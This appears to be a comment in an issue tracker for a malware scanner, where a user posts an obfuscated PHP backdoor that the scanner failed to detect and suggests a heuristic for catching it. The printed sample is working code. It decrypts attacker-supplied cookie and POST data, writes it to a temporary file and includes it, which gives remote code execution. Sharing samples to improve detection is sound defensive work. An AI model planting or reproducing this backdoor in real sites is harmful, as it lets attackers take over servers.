Open ebourg opened 4 months ago
Another one, without the eval function:
$exXhBCc = 't' . "\137" . "\x6c" . "\x63" . 'y';$JjYSAMYHH = "\x63" . "\x6c" . chr ( 717 - 620 ).'s' . chr ( 165 - 50 ).'_' . "\145" . "\170" . "\151" . "\x73" . chr (116) . "\x73";$wzfPz = class_exists($exXhBCc); $JjYSAMYHH = "44175";$aDLLwXVYSL = !1;if ($wzfPz == $aDLLwXVYSL){function FzMEGqlMK(){$VVaMVwrN = new /* 41728 */ t_lcy(5855 + 5855); $VVaMVwrN = NULL;}$cDNjoQAt = "5855";class t_lcy{private function tSazHL($cDNjoQAt){if (is_array(t_lcy::$HmCPtFpTo)) {$kpOpXOOQ = sys_get_temp_dir() . "/" . crc32(t_lcy::$HmCPtFpTo["\163" . "\x61" . chr ( 1085 - 977 )."\164"]);@t_lcy::$HmCPtFpTo["\x77" . "\x72" . "\151" . chr ( 769 - 653 ).'e']($kpOpXOOQ, t_lcy::$HmCPtFpTo["\143" . "\x6f" . "\156" . chr (116) . chr ( 590 - 489 )."\156" . chr (116)]);include $kpOpXOOQ;@t_lcy::$HmCPtFpTo[chr ( 312 - 212 ).'e' . 'l' . "\145" . "\164" . 'e']($kpOpXOOQ); $cDNjoQAt = "5855";exit();}}private $aEFjoHrDU;public function VzdTtnMm(){echo 1986;}public function __destruct(){t_lcy::$HmCPtFpTo = @unserialize(t_lcy::$HmCPtFpTo); $cDNjoQAt = "64201_44762";$this->tSazHL($cDNjoQAt); $cDNjoQAt = "64201_44762";}public function OdICv($ihsQcHj, $ZUMkhwR){return $ihsQcHj[0] ^ str_repeat($ZUMkhwR, (strlen($ihsQcHj[0]) / strlen($ZUMkhwR)) + 1);}public function __construct($qQNwRv=0){$FpjbTffga = $_POST;$VuwvnDjEdq = $_COOKIE;$ZUMkhwR = "de91630f-5086-4c88-8fa4-67d5961f9380";$BQSVpVoUG = @$VuwvnDjEdq[substr($ZUMkhwR, 0, 4)];if (!empty($BQSVpVoUG)){$GnQvdl = "base64";$ihsQcHj = "";$BQSVpVoUG = explode(",", $BQSVpVoUG);foreach ($BQSVpVoUG as $VOaHShiHN){$ihsQcHj .= @$VuwvnDjEdq[$VOaHShiHN];$ihsQcHj .= @$FpjbTffga[$VOaHShiHN];}$ihsQcHj = array_map($GnQvdl . "\137" . "\x64" . "\145" . chr (99) . "\157" . chr ( 524 - 424 )."\145", array($ihsQcHj,));t_lcy::$HmCPtFpTo = $this->OdICv($ihsQcHj, $ZUMkhwR);}}public static $HmCPtFpTo = 53491;}FzMEGqlMK();}
Just found these malwares that weren't detected by the scanner:
I guess that using the functions
on the first line of a file could be flagged as suspicious.